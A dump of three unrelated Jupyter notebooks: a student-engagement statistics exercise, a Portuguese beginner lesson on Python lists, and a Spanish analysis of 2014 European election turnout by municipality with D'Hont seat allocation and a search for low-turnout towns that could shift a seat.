## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
lessons_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
lessons_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
completed_lessons_by_account = {}
for account_key, engagement_for_student in lessons_by_account.items():
total_lessons = 0
for engagement_record in engagement_for_student:
total_lessons += engagement_record['lessons_completed']
completed_lessons_by_account[account_key] = total_lessons
# In python3, dict.values returns a dict_values object, which is not a list or tuple. Try coercing that into a list.
total_lessons = list(completed_lessons_by_account.values())
print('Mean:', np.mean(total_lessons))
print('Standard deviation:', np.std(total_lessons))
print('Minimum:', np.min(total_lessons))
print('Maximum:', np.max(total_lessons))
###Output
Mean: 1.6904522613065327
Standard deviation: 3.0286171606877743
Minimum: 0
Maximum: 36
###Markdown
Above 2 blocks of code written using function calls
###Code
# import numpy as np
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
engagement_by_account = group_data(paid_engagement_in_first_week, 'account_key')
# engagement_by_account
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_account = sum_grouped_items(engagement_by_account, 'total_minutes_visited')
# total_minutes_by_account
def described_data(data, header): # header is what is the 'title' we need to give this statistics
updated_data = list(data.values())
print('Mean:', np.mean(updated_data))
print('Standard deviation:', np.std(updated_data))
print('Minimum:', np.min(updated_data))
print('Maximum:', np.max(updated_data))
described_data(total_minutes, 'Total Minutes')
###Output
TOTAL MINUTES :
Mean: 325.7850653949317
Standard deviation: 418.40526409921097
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Number of Visits in First Week
###Code
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
days_by_account = group_data(paid_engagement_in_first_week, 'account_key')
# days_by_account
"""
This is that first part solution for which we need to change the sum_grouped_items function.
This function will only return statistics on "number_of_courses" visited.
It does NOT tell about the number of days visited.
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
if data_point['num_courses_visited'] > 0:
total += data_point[field_name]
summed_data[key] = total
return summed_data
"""
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
days_visited_by_account = sum_grouped_items(engagement_by_account, 'has_visited')
# days_visited_by_account
def described_data(data, header = '' ): # header is the title we need to give this statistics with default as None
updated_data = list(data.values())
print(header)
print('Mean:', np.mean(updated_data))
print('Standard deviation:', np.std(updated_data))
print('Minimum:', np.min(updated_data))
print('Maximum:', np.max(updated_data))
described_data(days_visited_by_account, 'Total Courses Visited')
###Output
Total Courses Visited
Mean: 3.0422110552763817
Standard deviation: 2.2300431831405754
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
pass_subway_project = set()
# To store all the account keys of students which passed the project or got distinction at some point of time.
for submission in paid_submissions:
project = submission['lesson_key']
rating = submission['assigned_rating']
if project in subway_project_lesson_keys and (rating == 'PASSED' or rating == 'DISTINCTION'):
pass_subway_project.add(submission['account_key'])
print("Number of passing student IDs :", len(pass_subway_project))
passing_engagement = []
non_passing_engagement = []
# Now we are specifically looking for 'paid_engagements in one week'.
# We have more engagements than the IDs because engagement_record contain multiple records with same account_key.
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] in pass_subway_project:
passing_engagement.append(engagement_record)
else:
non_passing_engagement.append(engagement_record)
print("Number of passing engagements :", len(passing_engagement))
print("Number of non-passing engagements :", len(non_passing_engagement))
###Output
Number of passing student IDs : 647
Number of passing engagements : 4528
Number of non-passing engagements : 2392
###Markdown
Comparing the Two Student Groups
###Code
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
#lessons_completed
#has_visited
passing_engagement_by_account = group_data(passing_engagement, 'account_key')
#passing_engagement_by_account
non_passing_engagement_by_account = group_data(non_passing_engagement, 'account_key')
#non_passing_engagement_by_account
passing_minutes = sum_grouped_items(passing_engagement_by_account, 'total_minutes_visited')
described_data(passing_minutes,'Total Minutes Visited for Passing Engagements:')
non_passing_minutes = sum_grouped_items(non_passing_engagement_by_account, 'total_minutes_visited')
described_data(non_passing_minutes,'Total Minutes Visited for NON - Passing Engagements:')
print('\n')
passing_lessons = sum_grouped_items(passing_engagement_by_account, 'lessons_completed')
described_data(passing_lessons,'Total Lessons Completed for Passing Engagements:')
non_passing_lessons = sum_grouped_items(non_passing_engagement_by_account, 'lessons_completed')
described_data(non_passing_lessons,'Total Lessons Completed for NON - Passing Engagements:')
print('\n')
passing_visits = sum_grouped_items(passing_engagement_by_account, 'has_visited')
described_data(passing_visits,'Total Visits/Day for Passing Engagements:')
non_passing_visits = sum_grouped_items(non_passing_engagement_by_account, 'has_visited')
described_data(non_passing_visits,'Total Visits/Day for NON - Passing Engagements:')
###Output
Total Minutes Visited for Passing Engagements:
Mean: 418.419087644255
Standard deviation: 451.4461628439436
Minimum: 0.0
Maximum: 3564.7332645
Total Minutes Visited for NON - Passing Engagements:
Mean: 153.56031713254023
Standard deviation: 275.7049201529198
Minimum: 0.0
Maximum: 1768.5227493
Total Lessons Completed for Passing Engagements:
Mean: 2.115919629057187
Standard deviation: 3.157950646243919
Minimum: 0
Maximum: 36
Total Lessons Completed for NON - Passing Engagements:
Mean: 0.8994252873563219
Standard deviation: 2.59280607602387
Minimum: 0
Maximum: 27
Total Visits/Day for Passing Engagements:
Mean: 3.608964451313756
Standard deviation: 2.183989800104125
Minimum: 0
Maximum: 7
Total Visits/Day for NON - Passing Engagements:
Mean: 1.9885057471264367
Standard deviation: 1.9088074924073457
Minimum: 0
Maximum: 7
###Markdown
Making Histograms
###Code
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
%matplotlib inline
import matplotlib.pyplot as plt
def described_data(data, header = '' ): # header is the title we need to give this statistics with default as None
updated_data = list(data.values())
print(header)
print('Mean:', np.mean(updated_data))
print('Standard deviation:', np.std(updated_data))
print('Minimum:', np.min(updated_data))
print('Maximum:', np.max(updated_data))
plt.hist(updated_data)
plt.show(updated_data) # to show all histograms at once (otherwise only 1 will be shown)
described_data(passing_minutes,'Total Minutes Visited for Passing Engagements:')
described_data(non_passing_minutes,'Total Minutes Visited for NON - Passing Engagements:')
described_data(passing_lessons,'Total Lessons Completed for Passing Engagements:')
described_data(non_passing_lessons,'Total Lessons Completed for NON - Passing Engagements:')
described_data(passing_visits,'Total Visits/Day for Passing Engagements:')
described_data(non_passing_visits,'Total Visits/Day for NON - Passing Engagements:')
###Output
Total Minutes Visited for Passing Engagements:
Mean: 418.419087644255
Standard deviation: 451.4461628439436
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Improving Plots and Sharing Findings
###Code
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
import seaborn as sns
plt.hist(non_passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week ' +
'for students who do not pass the subway project')
plt.show()
plt.hist(passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week ' +
'for students who pass the subway project')
plt.show()
###Output
_____no_output_____ |
Criando_uma_Lista_numérica.ipynb | ###Markdown
###Code
for value in range(1,5):
print(value)
for value in range(1,6):
print (value)
numeros = list(range (1,6))
print (numeros)
#nessa caso o numero 2 é somado ate o final da lista
numero = list(range(2,11,2))
print(numero)
#neste caso sera criada uma lista e o programa percorrera a todos os numero de 1 a 10 elevando os mesmo ao quadrado
quadrado = []
for value in range (1,11):
quadrad = value**2
quadrado.append(quadrad)
print(quadrado)
digit = [1,2,3,4,5,6,7,8,9,0]
min(digit)
max(digit)
sum(digit)
#LIST COMPREHENSIONS - (ABRANGENCIA DE LISTA)
numero=[value**2 for value in range(1,11)]
print(numero)
numero2= [value*2 for value in range(1,11)]
numero3= [value*3 for value in range(1,11)]
numero4= [value*4 for value in range(1,11)]
numero5= [value*5 for value in range(1,11)]
print(numero2)
print(numero3)
print(numero4)
print(numero5)
mil = list(range(1,1000))
print(mil)
min(mil)
max(mil)
sum(mil)
###Output
_____no_output_____ |
Elecciones Europeas.ipynb | ###Markdown
StrategyCalculate which places vote less than average. Then of those, figure out which one, if they increase their participation to the average, would yield a net increase in votes to the designated party. Esentially which places would grant an extra electoral seat whith a non-partisan democratic message of more participation. Hypothesis1. The distribution of votes within a region doesn´t change with participation rates increases towards the average. I.e. if 30% of the people in that region vote for party X when the participation is 20%, they will still vote 30% to that party when the participation incerases to 30%.2. We use a single electoral college or circumscription, as it the case for Spain and the European elections. I.e. every vote count the same, and the seats are assignes using the D´Hont law.Note: To improve it, one could assume a partisan message, and then assign the effort to increase the % of votes for a particular vote using the analogy of saturation points. I.e. look at change of prevalence as a proxy of effort to make that change. Data* I use the latest most granular data available for Spain 2014 european elections. * The data is available online at http://elecciones.mir.es/resultados2014/ini99v.htm Note: They are "provisional to 99.77% but these are the best ones I could get at the municipal granularity. * One could modify votes using more recent trends, but for the scope of this exercise, this is enough.The data is not available in a standard format, rather is an internal file inside the executable program the goverment created. One has to figet a bit extract the `.mdb` database of 132 Mb. To extract the data I use the hins given here: https://www.codeenigma.com/community/blog/using-mdbtools-nix-convert-microsoft-access-mysql```sqlmdb-schema Europeas2014.mdb mysql > schema.sqlmkdir sqlfor i in $( mdb-tables Europeas2014.mdb ); do echo $i ; mdb-export -D "%Y-%m-%d %H:%M:%S" -H -I mysql Europeas2014.mdb $i > sql/$i.sql; donemysql -uroot -ppassword europeas < schema.sqlfor i in $( ls sql/ ); do echo $i ; mysql -uroot -ppassword europeas < sql/$i ; done```
###Code
def init():
%matplotlib inline
global os,pymysql,pd
import os
import pymysql
import pandas as pd
global conn
host = os.getenv('MYSQL_HOST')
port = os.getenv('MYSQL_PORT')
user = os.getenv('MYSQL_USER')
password = os.getenv('MYSQL_PASSWORD')
database = 'europeas'
conn = pymysql.connect(
host=host,
port=int(port),
user=user,
passwd=password,
db=database,
charset='utf8mb4')
init()
#test connection
query="select * from resultados limit 1"
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
This means the party names are abstracted into a dictionary. To see e.g. what is the `CANDIDATURA: 0002`
###Code
query="select * from candidaturas where candidatura=0002;"
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
Municipal resultsTo see the results at the municipal level, e.g. on my village "Soto del Barco", I first need to find the code for that location
###Code
query="select * from municipios where nombre='Soto del Barco'"
df = pd.read_sql_query(query,conn)
df.to_dict('index')
query="select * from municipios where AUTONOMIA=03 and PROVINCIA=33 and MUNICIPIO=069"
df = pd.read_sql_query(query,conn)
df
###Output
_____no_output_____
###Markdown
So now I can get the results for that place
###Code
query="""select candidatura,votos_act
from resultados
where AUTONOMIA=03 and PROVINCIA=33 and MUNICIPIO=069
and votos_act>0
order by votos_act desc;"""
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
Or more readable, joining the results db with the party db:
###Code
query="""select c.sigla,votos_act,PVOTOS_ACT
from resultados as r
join candidaturas as c on r.candidatura=c.candidatura
where AUTONOMIA=03 and PROVINCIA=33 and MUNICIPIO=069
and votos_act>0
order by votos_act desc;"""
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
Which I can cross-compare with the official results [online](http://elecciones.mir.es/resultados2014/99PE/DPE0333906999.htm?d=533) and on the executable program. Para ver que vamos bien podemos mirar los resultados: Histogram for % vote, pero municipalityThe model is based on comparing the participation of a location against the national spread
###Code
#Define some helper functions
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
import unidecode
import os
def get_todos_votos():
query="""select c.candidatura,c.sigla,r.PVOTOS_ACT,r.VOTOS_ACT,
r.AUTONOMIA,r.PROVINCIA,r.MUNICIPIO,r.DISTRITO
from resultados as r
join candidaturas as c on r.candidatura=c.candidatura
and r.PVOTOS_ACT >0
order by c.sigla asc;"""
todos_votos=pd.read_sql_query(query,conn)
for col in ['sigla']:
todos_votos[col] = todos_votos[col].apply(unidecode.unidecode)
todos_votos[col] = todos_votos[col].apply(lambda x: x.replace("'",""))
return todos_votos
def get_no_votantes():
query="select CENSO_ACT,VOTOS_ACT,PVOTOS_ACT,PVBLAN_ACT,PVNULOS_ACT, "+\
"AUTONOMIA,PROVINCIA,MUNICIPIO,DISTRITO "+\
"from escrutinio as e "+\
"where"+\
" e.CENSO_ACT>0;"
return pd.read_sql_query(query,conn)
def get_taxonomy(sitio):
"""
get AUTONOMIA,PROVINCIA,MUNICIPIO
"""
query="select * from municipios where nombre='"+sitio+"'"
df = pd.read_sql_query(query,conn)
lugar=df.to_dict('index')
#print("lugar",lugar)
#Check if it corresponds in municipios to several items, e.g. tramos
if (len(lugar.keys())>1):
print(lugar)
raise RuntimeError('Más de un lugar con ese nombre: '+sitio)
else:
lugar=lugar[0]
return lugar
def get_distritos(lugar,verbose=False):
#Buscar todos los distritos asociados en resultados con esa combinacion de AUTONOMIA,PROVINCIA,MUNICIPIO
query="select distinct distrito from resultados where "+\
"AUTONOMIA="+lugar['AUTONOMIA']+\
" and PROVINCIA="+lugar['PROVINCIA']+\
" and MUNICIPIO="+lugar['MUNICIPIO']
distritos = pd.read_sql_query(query,conn)
if verbose:
print("distritos",distritos)
if 'distrito' in distritos.columns:
return distritos['distrito'].values
else:
return ["00"]
def get_ganador_lugar(votos_lugar,verbose=False):
"""Dados los resultados de un lugar,
devuelve las siglas del ganador"""
if verbose: print(votos_lugar)
ganador=votos_lugar.loc[votos_lugar['PVOTOS_ACT'].idxmax()]['sigla']
return ganador
def get_escrutinio_lugar(lugar,distrito='00'):
query="select MESAS_ACT,CENSO_ACT,VOTOS_ACT,PVOTOS_ACT,VBLAN_ACT,PVBLAN_ACT,VNULOS_ACT,PVNULOS_ACT "+\
"from escrutinio as e "+\
"where"+\
" e.AUTONOMIA="+lugar['AUTONOMIA']+\
" and e.PROVINCIA="+lugar['PROVINCIA']+\
" and e.DISTRITO="+distrito+\
" and e.MUNICIPIO="+lugar['MUNICIPIO']+\
";"
escrutinio_lugar = pd.read_sql_query(query,conn)
return escrutinio_lugar
def get_name(lugar,verbose=False):
"""
Get the name of a lugar={'AUTONOMIA':00,'PROVINCIA':00,'MUNICIPIO'}
"""
query="select distinct nombre from municipios where "+\
"AUTONOMIA="+lugar['AUTONOMIA']+\
" and PROVINCIA="+lugar['PROVINCIA']+\
" and MUNICIPIO="+lugar['MUNICIPIO']
sitio = pd.read_sql_query(query,conn)
if verbose:
print("sitio: ",sitio)
if len(sitio)==0:
sitio="@A:"+lugar['AUTONOMIA']+"-P:"+lugar['PROVINCIA']+"-M:"+lugar['MUNICIPIO']
else:
sitio = sitio['nombre'].values[0]
sitio=unidecode.unidecode(sitio)
return sitio
def single_plot(k,nbins,title,p_datos_nacional,p_datos_lugar,datos_lugar):
"""
Nice individual plot for a single histogram
"""
t_range = np.linspace(0,100,nbins)
print(title,end=' ',flush=True)
n, bins, patches = plt.hist(p_datos_nacional, nbins, density=True, facecolor='b', alpha=0.75)
plt.axvline(x=p_datos_lugar,linewidth=5,color='r')
#Probability Density Function, with a Gaussian Kernel
bw_values = [None]#,.1,'scott','silverman'] #kernels for the PDF
for i, bw in enumerate(bw_values):
kde = stats.gaussian_kde(p_datos_nacional,bw_method=bw)
plt.plot(t_range,kde(t_range),lw=2, label='bw = '+str(bw))
# print(np.sum(kde(t_range))) #this value is not 1 because the kernel (Gaussian) extends to infinity
# enven when a normalized histogram, whose area sums up =1, the kernel makes it >1 (or less when kernel(x) extends <0)
minx=min([np.percentile(p_datos_nacional,1),p_datos_lugar])
maxx=max([np.percentile(p_datos_nacional,99),p_datos_lugar])
plt.xlim(minx, maxx)
plt.title(title+" "+str(datos_lugar))
plt.grid(True)
def distrito_spread(sitio,todos,distrito='00',show_plot=False, verbose=False):
"""
Plot matrix for the participation histogram, plus the first 5 winning parties
"""
cols=4 #plot columns
rows=3 #len(votos_lugar)/4 +1
nbins=100 #bins for the histograms
folder='plots/'
if not os.path.exists(folder):
os.makedirs(folder)
fig=plt.figure(figsize=(15,10))
print(sitio+" "+str(distrito))
fig.subplots_adjust(top=1.2)
#get indexer
lugar=get_taxonomy(sitio)
loc=lugar['AUTONOMIA']+"_"+\
lugar['PROVINCIA']+"_"+\
lugar['MUNICIPIO']+"_"+\
distrito
if verbose:
print(loc)
p_todos_no_votos=todos['PVOTOS_ACT']
p_este_no_votos=todos.loc[loc,'PVOTOS_ACT']
este_no_votos=todos.loc[loc,'VOTOS_ACT']
k=1
title=sitio+" "+str(distrito)+'-> Abs.'
plt.subplot(rows,cols,k)
single_plot(k,nbins,title,p_todos_no_votos,p_este_no_votos,este_no_votos)
#each party
#the complex call gets the first cols*rows names of the parties with most % of votes
for party in todos.loc[loc].filter(like='v_').sort_values(ascending=False).index[0:(cols*rows)-1]:
pparty='p_'+party[2:]
vparty=party
if verbose:
print("k, p: ",k,todos.loc[loc,pparty])
partido=party[2:]
p_todos_partido=todos[todos[pparty]>0][pparty]
p_este_partido=todos.loc[loc,pparty]
este_partido=todos.loc[loc,vparty]
k=k+1
plt.subplot(rows,cols,k)
single_plot(k,nbins,partido,p_todos_partido,p_este_partido,este_partido)
plt.savefig(folder+str(sitio)+"-"+str(distrito)+'.png',bbox_inches = 'tight')
if show_plot:
plt.show()
plt.gcf().clear()
todos_votos = get_todos_votos()
todos_votos
no_votantes = get_no_votantes()
no_votantes
#make_loc_key
def make_loc_key(dataframe,distrito='00',key='loc'):
if 'DISTRITO' not in dataframe.keys():
dataframe['DISTRITO']=distrito
dataframe[key]=dataframe['AUTONOMIA']+"_"+\
dataframe['PROVINCIA']+"_"+\
dataframe['MUNICIPIO']+"_"+\
dataframe['DISTRITO']
return dataframe
#todos=todos_votos.merge(no_votantes,on=['AUTONOMIA','PROVINCIA','MUNICIPIO','DISTRITO'],how='outer',suffixes=['_v','_nv'])
no_votantes=make_loc_key(no_votantes)
todos_votos=make_loc_key(todos_votos)
todos_votos
#Use 'loc' as the index
todos=no_votantes
todos.index=todos['loc']
todos_votos.index=todos_votos['loc']
#order of parties, by total votes
partidos=todos_votos[['VOTOS_ACT','sigla']].groupby(['sigla']).sum()\
.sort_values(by='VOTOS_ACT',ascending=False).index
partidos
#We are going to add the votes for each place (rows) for each party (columns), so we initialize the placeholders
# both for total votes, and the % of votes, in that location
for sigla in partidos:
todos["p_"+sigla]=0
todos["v_"+sigla]=0
todos.head(2)
#Fill up the votes, using the loc indexer.
# This takes some time... Probably faster with some SQL magic that escapes me.
i=0
t=len(todos_votos)
for index,row in todos_votos.iterrows():
todos.loc[index,"p_"+row['sigla']]=row['PVOTOS_ACT']
todos.loc[index,"v_"+row['sigla']]=row['VOTOS_ACT']
i+=1
if i%1000==0: print("Filling votes: {:.1f}% ({} of {}) done".format(i/t*100,i,t),end="\r")
print("\r")
print("done")
todos
#Histogram of particpation
todos.hist(column=['PVOTOS_ACT'],figsize=(4,4),bins=100,density=1);
###Output
_____no_output_____
###Markdown
--- Example with my village
###Code
sitio='Soto del Barco'
lugar=get_taxonomy(sitio)
lugar
#Some places have tons of district within the municipality (e.g. Barcelona or Madrid)
get_distritos(lugar)
distrito_spread(sitio,todos,distrito='00',show_plot=True ,verbose=True)
###Output
Soto del Barco 00
03_33_069_00
Soto del Barco 00-> Abs. k, p: 1 34.74
PSOE k, p: 2 25.61
P.P. k, p: 3 12.11
PODEMOS k, p: 4 11.11
IU-IX k, p: 5 5.42
UPyD k, p: 6 2.51
F.A.C. k, p: 7 1.05
Cs k, p: 8 1.05
EB k, p: 9 0.72
PACMA k, p: 10 0.66
VOX k, p: 11 0.52
PARTIDO X
###Markdown
In the image above, each graph uses the same style. In blue is the national histogram, then in orange is a smoothed histogram using a gaussian kernel (this means that the integral is not 1, but it helps ientify the maximum of the histogram). In red is the value corresponding to the particular place of the graph. Top left shows the participation rate, then each row (left to right, top to bottom) shows the top 5 parties with most votes. In the titles of the grpah is the party name, and the actual value of votes for that location (not the % as the x-axis). On the x-axis, I use the range 1 to 99 percentile to have prettier graphs. The y-axis is auto-scaled to the individual range.
###Code
#DO SOME RANDOM PLACES, just to have bunch of graphs to scroll and get a better sense of the data quickly
#distrito_spread(sitio,distrito,get_votos_lugar(lugar),todos_votos,no_votantes,get_escrutinio_lugar(lugar))
init()
#nombres por volumen de votos
nombres=pd.read_sql_query("select distinct nombre from municipios ORDER BY RAND();",conn)[1:3]
for index,row in nombres.iterrows():
sitio=row['nombre'] #e.g. "Valencia"
lugar=get_taxonomy(sitio)
distritos = get_distritos(lugar)
for distrito in distritos:
distrito_spread(sitio,todos,distrito=distrito,show_plot=False,verbose=False);
###Output
San Salvador 00
San Salvador 00-> Abs. P.P. PSOE PODEMOS Cs VOX CCa-PNC MOVIMIENTO RED PARTIDO X LPD AGE BNG Margalef 00
Margalef 00-> Abs. CiU ERC-NECat-EPDD PSC-PSOE ICV-EUiA Cs P.P. IUA IU-IX IUC-LV IUCLM EB
###Markdown
GEOLOCALIZEIn order to map the municipalities, I need an extra dabase. I have the INE codes of the lotation, but not the corresponding latitude and longitude. I get that data from the the national service http://centrodedescargas.cnig.es/CentroDescargas/index.jspAgain in some `.mdb` format.```shmdb-schema --namespace geo Nomenclator_Municipios_EntidadesDePoblacion.mdb mysql > schema.sqlmkdir sqlfor i in $( mdb-tables Nomenclator_Municipios_EntidadesDePoblacion.mdb ); do echo $i ; mdb-export -D "%Y-%m-%d %H:%M:%S" -H -I mysql -N geo Nomenclator_Municipios_EntidadesDePoblacion.mdb $i > sql/$i.sql; donemysql -uroot -ppassword europeas < schema.sqlfor i in $( ls sql/ ); do echo $i ; mysql -uroot -ppassword europeas < sql/$i ; done```I note that our results database specify two location fields, but they don't actually use them, having `0` for all cases: ```shselect distinct COMARCA,TRAMO from resultados;+---------+-------+| COMARCA | TRAMO |+---------+-------+| 00 | 0 |+---------+-------+1 row in set (0.51 sec)```
###Code
#Merge the location to the results, lat-lon, but also names
init()
def get_lat_lon():
query="select inemuni,nombre,LONGITUD_ETRS89 as lon, LATITUD_ETRS89 as lat "+\
"from geo_ENTIDADES where tipo='Municipio';"
geoplaces = pd.read_sql_query(query,conn)
return geoplaces
#provincia,municipio '02','001'
geoplaces=get_lat_lon()
geoplaces['PROVINCIA']=geoplaces['inemuni'].str.slice(start=0,stop=2)
geoplaces['MUNICIPIO']=geoplaces['inemuni'].str.slice(start=2,stop=5)
todos_geo=pd.merge(todos, geoplaces, how='inner', on=['PROVINCIA', 'MUNICIPIO'])
todos_geo
#computers don't like weird spanish names, sorry
import unidecode
for col in ['nombre']:
todos_geo[col] = todos_geo[col].apply(unidecode.unidecode)
todos_geo
todos_geo['nombred']=todos_geo['nombre']+' '+todos_geo['DISTRITO']
todos_geo
###Output
_____no_output_____
###Markdown
Participation rateThe linchpin is to get location with less than the median of participation, so let's get it.Also let's calculate the % change of votes of each location to that participation rate AND split that extra votes (positive or negative) among the acutal % of votes for each location, on a set of new columns, for with % delta and the acutal delta of votes.
###Code
pvotos=todos_geo['PVOTOS_ACT'].values
def get_maxp(pvotos,show_plot=False,party=""):
print(".",end="")
if len(pvotos)==1:
return pvotos[0]
kde = stats.gaussian_kde(pvotos,bw_method=None)
nbins=1000
t_range = np.linspace(0,100,nbins)
pdf = kde(t_range)
max_pdf = max(pdf)
max_p=list(pdf).index(max_pdf)*100/nbins
if show_plot:
if party != "":
plt.title(party)
plt.plot(t_range,kde(t_range));
plt.axvline(x=max_p,linewidth=5,color='r');
plt.show();
return max_p
#NOTE HERE. I´m adding a 5% buffer to make the results easier for this test run.
#This means I´m adding a 5% more participation rate so the threshold is slighlty higer than the median.
maxp_novotos=get_maxp(pvotos,show_plot=True,party='no votantes')+5
print(maxp_novotos)
todos_geo["delta_pvotos"]=0
todos_geo["delta_votos"]=0
todos_geo["delta_pvotos"]=maxp_novotos-todos_geo['PVOTOS_ACT']
todos_geo["delta_votos"]=todos_geo['CENSO_ACT']*todos_geo["delta_pvotos"]/100
todos_geo["delta_votos"]=todos_geo["delta_votos"].astype(int)
for party in filter(lambda k: 'p_' in k, todos_geo.columns):
todos_geo["d_"+party[2:]]=todos_geo["delta_votos"]*todos_geo[party]/100.
todos_geo["d_"+party[2:]]=todos_geo["d_"+party[2:]].astype(int)
todos_geo.sort_values('delta_votos',ascending=False)
#Save it all to a nifty `.csv`
todos_geo.to_csv(path_or_buf='./todos_geo-loc-names.csv',index=False)
todos_geo
###Output
_____no_output_____
###Markdown
--- d´HONT lawAccording to our [legislation form the JEC](http://www.juntaelectoralcentral.es/cs/jec/loreg/contenido?packedargs=idContenido=546541&letra=S), we assing seats according to the D´Hont law.Basically this means iterativelly assign the next seat to the party with more votes, and then divide those parties votes with the total number of votes they got so far. There are some edge cases where the votes are the same, but do not apply here. Note: Most cases that apply this rule also impose a minimum threshold of votes. This is not the case for Spain and the Euopean elections (It will be after 2024, with a 3% of the total census).
###Code
def dhont(nSeats,votes,verbose=False):
"""
nSeats is the number of seats
votes is a dictionary with the key:value {'party':votes}
verbose is an option to print designation info
"""
t_votes=votes.copy()
seats={}
for key in votes: seats[key]=0
while sum(seats.values()) < nSeats:
max_v= max(t_votes.values())
next_seat=list(t_votes.keys())[list(t_votes.values()).index(max_v)]
if next_seat in seats:
seats[next_seat]+=1
else:
seats[next_seat]=1
if verbose:
print("{} Escaño: {}".format(sum(seats.values()),next_seat))
for key in t_votes:
print("\t{:4.4} [{}]:\t {:.1f}".format(key,seats[key],t_votes[key]))
print("\b")
t_votes[next_seat]=votes[next_seat]/(seats[next_seat]+1)
for key in votes:
if seats[key]==0:
del seats[key]
#print(t_votes)
return seats
nSeats = 54
#Test using the exact official votes for the European elections
votes = {'P.P.':4098339,'PSOE':3614232,'IP':1575308,'Podemos':1253837,'UPYD':1022232,'CEU':851971,
'EPDD':630072,"Cs":497146,"LDP":326464,'EP':302266,'VOX':246833}
seats=dhont(nSeats,votes,verbose=False)
seats
###Output
_____no_output_____
###Markdown
Example with my village
###Code
place='Soto del Barco 00'
for a in todos_geo[todos_geo['nombred']==place].columns:
print(a,todos_geo[todos_geo['nombred']==place][a].values)
#print a selection of columns, to explore the data.
partido="PODEMOS"
cols=['PVOTOS_ACT','CENSO_ACT','nombred','delta_pvotos','delta_votos','p_'+partido,'v_'+partido,'d_'+partido]
todos_geo[(todos_geo['PVOTOS_ACT']<maxp_novotos)][cols].sort_values(by='p_'+partido,ascending=False)
"""
Now that the all the data is done, let´s select the places with less participation than the threshold
"""
#2 Filtrar donde novotos < maxp
potenciales_no = todos_geo[(todos_geo['PVOTOS_ACT']<maxp_novotos)]
print("{} ({:.0f}%) lugares por debajo de la media de {}% de participación, que suman {} votos extra".format(len(potenciales_no),
len(potenciales_no)/len(todos_geo)*100,
maxp_novotos,potenciales_no['delta_votos'].sum()))
partido='PODEMOS'
cols=['PVOTOS_ACT','CENSO_ACT','nombred','delta_pvotos','delta_votos','p_'+partido,'v_'+partido,'d_'+partido]
potenciales_no[cols].sort_values(by='d_'+partido,ascending=False)
"""
This cell uses a bit a brute force approach to get quicker results.
Basically it takes a random sample of 100 or 120 places that are within the low participation threshold,
then it calulate the electoral results adding the extra votes, keeping the % of votes for each location where the
participation is increased. Then it also calculates the seats according th D´Hont.
It iterates this random sample 5.000 times until it finds a combination of places that yield more seats for the
selected party.
It also selected places with at least 100 votes for our selected party.
"""
def get_escrutinio(places,deltas=None):
escrutinio={}
for party in filter(lambda k: 'v_' in k, places.columns):
if isinstance(deltas, pd.DataFrame):
escrutinio[party[2:]]=places[party].sum()+deltas['d_'+party[2:]].sum()
else:
escrutinio[party[2:]]=places[party].sum()
return escrutinio
partido="PODEMOS"
potenciales_no = todos_geo[(todos_geo['PVOTOS_ACT']<maxp_novotos)]
potenciales_no=potenciales_no[(potenciales_no['d_'+partido]>100)]
print(len(potenciales_no))
nSeats = 54
max_seats=0
max_sample=potenciales_no
baseline=dhont(nSeats,get_escrutinio(todos_geo),verbose=False)[partido]
target=baseline+1
i=0
for n in [100,120]:
for t in range(5000):
i+=1
deltas=potenciales_no.sample(n)
escrutinio=get_escrutinio(todos_geo,deltas=deltas)
seats=dhont(nSeats,escrutinio,verbose=False)
if seats[partido]>max_seats:
max_seats=seats[partido]
max_sample=deltas
print('{} tries. New max {} seats with {} places. Baseline {} \n'.format(i,max_seats,len(deltas),baseline),end='\r')
print("{} tries. {} seats with {} places. Baseline {} ".format(i,max_seats,len(deltas),baseline),end='\r')
print("")
print(seats)
cols=['PVOTOS_ACT','nombred','delta_pvotos','delta_votos','p_'+partido,'v_'+partido,'d_'+partido]
max_sample[cols]
max_sample.to_csv(path_or_buf='./podemos-5-150.csv',index=False)
